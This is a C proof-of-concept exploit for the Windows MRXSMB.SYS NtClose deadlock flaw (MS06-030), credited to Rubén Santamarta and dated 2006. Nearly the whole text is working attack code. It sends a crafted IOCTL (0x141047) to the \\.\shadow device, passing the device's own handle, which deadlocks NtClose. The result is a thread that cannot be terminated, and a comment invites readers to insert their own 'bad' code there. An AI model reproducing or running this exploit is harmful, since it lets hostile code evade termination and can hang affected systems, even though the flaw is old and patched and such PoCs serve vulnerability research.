MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030)
Source: http://www.reversemode.com  Author: ruben  Published: 2006-06-14

////////////////////////////////////////////////////////////////////////////////
///////// MRXSMB.SYS NtClose DEADLOCK exploit///////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//November 19,2005
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//ONLY FOR EDUCATION PURPOSES
////////////////////////////////////////////////////////////////////////////////
// Rubén Santamarta
// ruben (at) reversemode (dot) com
// http://www.reversemode.com
////////////////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // malloc(), exit()


// IOCTL code sent to the shadow device in KillMySelf()
#define MAGIC_IOCTL 0x141047


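// Show the system message for GetLastError() in a message box, then exit.
VOID ShowError()
{
    LPVOID lpMsgBuf;

    // ANSI variants used throughout so the buffer type matches MessageBoxA
    FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
                   NULL,
                   GetLastError(),
                   MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                   (LPSTR) &lpMsgBuf,
                   0,
                   NULL);
    MessageBoxA(0, (LPSTR)lpMsgBuf, "Error", 0);
    exit(1);
}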


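// Worker thread: prints a counter once per second so it is visible
// that the thread is still running after the main thread has ended.
DWORD WINAPI IamAlive(LPVOID lpParam)
{
    DWORD i;

    (void)lpParam; // unused

    for (i = 0; i < 0x1000; i++)
    {
        Sleep(1000);
        printf("\rI am a Thread and I am alive [%x]", i);
    }

    return 0;
}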


VOID KillMySelf()
{
    DWORD junk;
    DWORD *OutBuff;
    HANDLE hDevice;

    // Open the shadow device exposed by MRXSMB.SYS
    hDevice = CreateFileA("\\\\.\\shadow", FILE_EXECUTE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE,
                          NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) ShowError();

    // 0x18-byte output buffer (six DWORDs)
    OutBuff = (DWORD*)malloc(0x18);
    if (!OutBuff) ShowError();

    // The fourth DWORD (offset 0x0C) carries the handle of the device itself
    OutBuff[3] = (DWORD)hDevice;

    DeviceIoControl(hDevice,
                    MAGIC_IOCTL,
                    0, 0,
                    OutBuff, 0x18,
                    &junk,
                    (LPOVERLAPPED)NULL);
    // MAIN THREAD ENDING.
}


int main(int argc, char *argv[])
{
    LPTHREAD_START_ROUTINE GoodThread;
    DWORD dwThreadId;

    GoodThread = (LPTHREAD_START_ROUTINE)IamAlive;

    printf("-=[MRXSMB.SYS NtClose Vulnerability POC]=-\n");
    printf("\t(Only for educational purposes)\n");
    printf("..http://www.reversemode.com..\n\n");
    printf("Launching Thread ...");

    // PUT YOUR "GOOD" OR "BAD" CODE HERE
    // e.g GoodThread
    CreateThread(NULL, 0, GoodThread, 0, 0, &dwThreadId);

    printf("Done\n");
    printf("I am going to dissapear,but I will be with you forever\n");
    printf("(..)\n\n");
    KillMySelf(); // Immortal mode "on" ;)

    return(1);
}




 